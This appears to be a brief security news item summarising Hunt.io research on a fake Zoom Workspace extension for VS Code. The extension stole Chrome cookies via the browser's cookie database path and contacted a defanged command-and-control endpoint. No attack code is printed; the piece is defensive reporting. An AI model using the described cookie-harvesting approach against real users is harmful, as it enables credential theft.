Ddos 
Source: Hunt.io
A recent investigation by Hunt.io has unveiled a concerning campaign targeting software developers through malicious Visual Studio Code (VS Code) extensions. The primary culprit is a deceptive extension impersonating the popular Zoom Workspace tool, designed to steal Google Chrome cookies and other sensitive data.
The malicious extension, uploaded to the VS Code Marketplace on November 30, initially appeared legitimate, even linking to the official GitHub repository for Zoom’s Meeting SDK. However, further investigation revealed its true purpose. Version 0.2.2 introduced malicious code targeting Chrome cookies, suggesting a phased approach by the attackers to evade early detection.
To gain users’ trust, the threat actors posted a single positive review on the extension’s release date, possibly from an inauthentic account.
The extension’s core malicious functionality is embedded within its file structure:
- Targeting Chrome Cookies: Using the path AppData\Local\Google\Chrome\User Data\Default\Cookies, the extension retrieves cookie data via SQLite queries, capturing sensitive details such as host keys, cookie values, and expiration dates.
- Suspicious Endpoint: The script communicates with https://api.storagehb[.]cn, a server located in China. Though the endpoint returned a 404 status during analysis, it is believed to serve as a command-and-control (C2) node or data storage facility.
- Hardcoded Secrets: Alarmingly, the extension’s .env file contains API keys for over 20 services, including GitHub, AWS, and PayPal.
The phased approach to deploying malicious code, combined with the use of obfuscation and asynchronous data fetching, demonstrates a high level of sophistication.
This incident serves as a wake-up call for developers relying on extensions to enhance their IDEs. “Compromising an IDE can serve as a gateway for further attacks within an organization’s development lifecycle,” the report warns. Developers are encouraged to scrutinize extensions with low install counts and limited reviews, as these are often red flags.
Donate